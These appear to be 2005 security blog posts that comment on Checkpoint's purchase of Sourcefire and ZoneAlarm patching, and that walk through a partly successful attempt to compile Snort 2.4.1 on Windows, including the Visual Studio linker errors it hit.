Also, I appear to have been demoted at my own company. I am not a "principle" at TaoSecurity. My boss must be upset with my performance! :)

Saturday, 08 October 2005

Thoughts on the Week's Security News

This was a busy week for me; I spent all week teaching (and all last week preparing) a private Network Security Operations class in California. I just flew back from LAX to Dulles this morning and I get on another plane tomorrow afternoon. I'm speaking in San Jose at a Cisco event, and then teaching a second private NSO class again next week.

I've been tracking all of the week's security news. Thank you to those who thought I may have missed something. I didn't want to commit any thoughts to the blog without taking some time to ponder various events. Obviously the biggest news of the week was Checkpoint's $225 million acquisition of Sourcefire.

In short, I didn't see that coming. I have doubts about the future of Snort being a free product, let alone open source. I don't see anyone making the case to the board of a publicly traded company that part of that company's work is going to be given away for free, especially after spending $225 million for it.

You may have seen how Checkpoint is treating users of the free version of Zonealarm, which was purchased by Checkpoint two years ago for $225 million. Sure, the basic Zonealarm firewall is still free, but Checkpoint will not provide a patch for a new security problem. Checkpoint claims the problem has low severity even though proof of concept code exists. To quote John LaCour, director of security services: "It is a theoretical attack that we don't see used in the real world." Great. That rationale has certainly stood the test of time (not).

However, I do not fault Sourcefire at all for being purchased. I never faulted them for the way they handled the new rules licensing, either. The amount of manpower and resources they devote to Snort is incredible, so I am happy to see them be rewarded. I am just not sure Checkpoint is the right fit, at least from where I stand. What are your thoughts?

Thursday, 22 September 2005

John Ward Compiles Snort on Windows

Newsflash: compiling Snort on Windows is not the chore some people believe it to be. After reading my flailing attempt to use a beta Visual Studio to compile Snort 2.4.1 from source on my Windows 2000 laptop, John Ward stepped in and got the job done. John's a professional programmer, but anyone who uses his approach will have the same results. Thanks for stepping up to the plate!

Monday, 19 September 2005

Compiling Snort on Windows

Many of you have undoubtedly read the snort-users thread where some people complain about not having Snort in compiled form as soon as Sourcefire releases Snort in source code form. Sourcefire released Snort 2.4.1, a vulnerability bug fix, on Friday. They only released an updated snort-2.4.1.tar.gz archive. There were no Linux RPMs or Win32 installation packages.

I decided to learn what was involved with compiling Snort on Windows. Right now I will say I did not finish the job. I am not a Windows programmer. I do not use Windows as a software development platform. Today was the first day I used the tools I describe below. The purpose of this post is to demonstrate that compiling Snort on Windows is not rocket science.

First, notice the snort-2.4.1.tar.gz archive has a src\win32 directory with these contents:

Makefile.in
WIN32-Code
WIN32-Includes
WIN32-Prj
WIN32-Libraries
Makefile.am

This looks promising. Let's see the contents of the WIN32-Prj directory.

snort_installer.nsi
build_releases.bat
snort_installer_options.ini
snort.dsw
snort.dsp
pcre.dll
LibnetNT.dll
snort.mak
snort.dep

snort.dsp is a Visual C++ project file. I don't have Visual C++ on my Windows 2000 laptop. A visit to MSDN shows Visual C++ Express Edition Beta 2 is free for download. I retrieve and install the program. After agreeing to convert Sourcefire's Visual C++ 6 files into a newer format, I am ready to try to "Build" Snort.

Along the way I read an error about a missing executable called mc. David Bianco in #snort-gui hypothesizes that mc means message compiler, a program available in the Windows® Server 2003 SP1 Platform SDK. Since the SDK works fine on Windows 2000, I install it. I also edit my system's environment variables so Windows knows where to find mc.exe in the future.

Once Visual Studio knows how to find mc.exe, it begins complaining that it cannot find header files such as winsock2.h, which live in the C:\Program Files\Microsoft Platform SDK\Include directory. Remember, I have never used Visual Studio before, and I have read no documentation. I figure the easiest way forward is to just copy the contents of the C:\Program Files\Microsoft Platform SDK\Include directory into the src\win32\WIN32-Includes directory. That problem is solved.

My next hurdle involves providing Snort with the WinPcap headers it needs. I retrieve WinPcap 3.0 in source code format since my test system uses WinPcap 3.0. Should I get Snort to compile I figure it should have the same version of WinPcap as installed on the laptop. I use the same *.h file copy trick to copy the contents of \winpcap\wpcap\libpcap\Win32\Include to src\win32\WIN32-Includes. I do the same for \winpcap\wpcap\libpcap\ .h files.

At this point I run into a problem caused by the Visual Studio project's insistence on building a version of Snort with database support. I figure the easiest one to build is a "release" version for MySQL (as opposed to a "debug" version).

During the build I see an error about mysql_time.h not being found. I download the Windows source for MySQL 4.0.26 only to find mysql_time.h is not in the mysql-4.0.26\include directory. I then download 5.0.12-BETA and see mysql-5.0.12-beta\include has mysql_time.h, just as I needed.

After taking care of the related library file locations, I had everything I needed to progress to the linking stage. Unfortunately, this was where my build process ended with the following errors:

Linking...
util.obj : error LNK2019: unresolved external symbol __imp__DeregisterEventSource@4 referenced in function _CreateApplicationEventLogEntry
syslog.obj : error LNK2001: unresolved external symbol __imp__DeregisterEventSource@4
util.obj : error LNK2019: unresolved external symbol __imp__ReportEventA@36 referenced in function _CreateApplicationEventLogEntry
syslog.obj : error LNK2001: unresolved external symbol __imp__ReportEventA@36
util.obj : error LNK2019: unresolved external symbol __imp__RegisterEventSourceA@8 referenced in function _CreateApplicationEventLogEntry
syslog.obj : error LNK2001: unresolved external symbol __imp__RegisterEventSourceA@8
misc.obj : error LNK2019: unresolved external symbol __imp__IsTextUnicode@12 referenced in function _print_interface
syslog.obj : error LNK2019: unresolved external symbol __imp__RegCloseKey@4 referenced in function _AddEventSource
win32_service.obj : error LNK2001: unresolved external symbol __imp__RegCloseKey@4
mysqlclient.lib(my_init.obj) : error LNK2001: unresolved external symbol __imp__RegCloseKey@4
syslog.obj : error LNK2019: unresolved external symbol __imp__RegSetValueExA@24 referenced in function _AddEventSource
win32_service.obj : error LNK2001: unresolved external symbol __imp__RegSetValueExA@24
syslog.obj : error LNK2019: unresolved external symbol __imp__RegCreateKeyA@12 referenced in function _AddEventSource
win32_service.obj : error LNK2019: unresolved external symbol __imp__RegQueryValueExA@24 referenced in function _ReadServiceCommandLineParams
win32_service.obj : error LNK2019: unresolved external symbol __imp__RegOpenKeyExA@20 referenced in function _ReadServiceCommandLineParams
mysqlclient.lib(my_init.obj) : error LNK2001: unresolved external symbol __imp__RegOpenKeyExA@20
win32_service.obj : error LNK2019: unresolved external symbol __imp__SetServiceStatus@8 referenced in function _SnortServiceCtrlHandler@4
win32_service.obj : error LNK2019: unresolved external symbol __imp__CloseServiceHandle@4 referenced in function _InstallSnortService
win32_service.obj : error LNK2019: unresolved external symbol __imp__CreateServiceA@52 referenced in function _InstallSnortService
win32_service.obj : error LNK2019: unresolved external symbol __imp__OpenSCManagerA@12 referenced in function _InstallSnortService
win32_service.obj : error LNK2019: unresolved external symbol __imp__RegCreateKeyExA@36 referenced in function _InstallSnortService
win32_service.obj : error LNK2019: unresolved external symbol __imp__DeleteService@4 referenced in function _UninstallSnortService
win32_service.obj : error LNK2019: unresolved external symbol __imp__OpenServiceA@12 referenced in function _UninstallSnortService
win32_service.obj : error LNK2019: unresolved external symbol __imp__RegDeleteKeyA@8 referenced in function _UninstallSnortService
win32_service.obj : error LNK2019: unresolved external symbol __imp__RegisterServiceCtrlHandlerA@8 referenced in function _SnortServiceStart@8
win32_service.obj : error LNK2019: unresolved external symbol __imp__StartServiceCtrlDispatcherA@4 referenced in function _SnortServiceMain
mysqlclient.lib(my_init.obj) : error LNK2019: unresolved external symbol __imp__RegEnumValueA@32 referenced in function _my_win_init
.\snort___Win32_MySQL_Release/snort.exe : fatal error LNK1120: 20 unresolved externals

I do not know how to fix these unresolved external symbols. Does anyone have any ideas?

At this point, I do not think I've done too badly for someone with zero Windows development experience!